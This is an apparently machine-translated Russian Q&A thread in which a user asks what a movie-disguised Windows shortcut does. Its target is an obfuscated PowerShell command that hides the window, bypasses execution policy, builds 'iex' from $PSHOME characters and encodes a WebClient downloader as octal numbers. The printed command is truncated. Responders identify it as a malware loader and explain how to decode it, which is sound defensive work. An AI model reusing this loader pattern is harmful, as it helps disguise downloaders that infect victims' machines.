Что конкретно делает эта ссылка или это вирус?

1195
Erik

В Windows 10 я скачал этот файл, который, как мне показалось, был фильмом, но это был ярлык размером 700 МБ.

Я вижу, что цель это

C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -NoPr -WINd 1 -eXEc ByP. ($ pshOmE [4] + $ PShoMe [30] + 'X') (-JoiN ((44, 141, 163, 160, 170, 40, 75, 40, 50,50, 116, 145, 167,55, 117, 142, 152,145, 143, 164,40,123, 171,163,164, 145,155,56, 116

И это должно было начаться в

% SYSTEMROOT% \ System32 \ WindowsPowerShell \ v1.0

Что оно делает?

6
-nopr, -wind и byp все довольно страшные ... Числа формируют немного сдвинутый URL, но у меня нет знаний, чтобы понять, к чему он стремится. spikey_richie 5 лет назад 1
спасибо, я на самом деле нажал на ссылку, Powershell ненадолго всплыл вот и все, пока Erik 5 лет назад 0
Это явно какая-то вредоносная программа. Цифры являются восьмеричными числами, которые переводятся в `$ aspx = ((New-Object System.N`, но для этого потребуется гораздо больше, чтобы понять, для чего он предназначен. Если на нем установлен троян например, регистратор ключей, вы не будете знать о его наличии. Отключитесь от Интернета, перезапустите (не перезагружайте) и запустите полное сканирование на вирусы (включая проверку на наличие руткитов). В зависимости от его природы, он мог заразиться другие системы в вашей сети. AFH 5 лет назад 7
У меня есть McaFee LiveSafe Premium, но он не реагировал Erik 5 лет назад 0
Некоторый подобный запутанный код задокументирован [здесь] (https://www.hybrid-analysis.com/sample/afe37a79b49e80d09ab51400c291cb9d50b73cc561bb409c1d7b9c7bc3b002d0/5b28c36b7ca3e11c945. AFH 5 лет назад 1

1 ответ на вопрос

9
Michał Sacharewicz

Это загрузчик вредоносных программ.

Он выполняет код PowerShell, начинающийся с New-Object System.N...(скрытого в цифрах), который в полном содержимом является тем New-Object System.Net.WebClient, который в дальнейшем будет использоваться для загрузки и выполнения реального вредоносного ПО с URL-адреса, который также скрыт в других номерах запутанного кода.

Если вы уже нажали на ссылку, то, скорее всего, вы уже заражены, если только URL не был удален.

Вы можете попытаться вставить свою строку в блокнот, а затем удалить все ( -JoiN( (, скопировать оставшуюся часть (начиная с ( -JoiN( (...) и вставить ее в окно PowerShell. Он раскроет запутанный код PowerShell, который обычно выполняется предыдущим $pshOmE[4]+$PShoMe[30]+'X')= iex= Invoke-Expression.

спасибо, я получил этот код: ** 441411631601704075405050116145167551171421521451431644012317116316414515556116 ** Как я могу разобрать что-то из этого кода? Erik 5 лет назад 0
Возможно, в файле ярлыка скрыты дополнительные части кода (например, фактический URL), которые добавляются к команде при запуске ярлыка. trognanders 5 лет назад 1
Пожалуйста, передайте полный код, вкл. запятые. Michał Sacharewicz 5 лет назад 0
это код, который я получил, следуя вашим инструкциям, 441411631601704075405050116 ..... Erik 5 лет назад 0
Вы что-то упускаете. Пожалуйста, вставьте весь код быстрого доступа. Michał Sacharewicz 5 лет назад 0

Похожие вопросы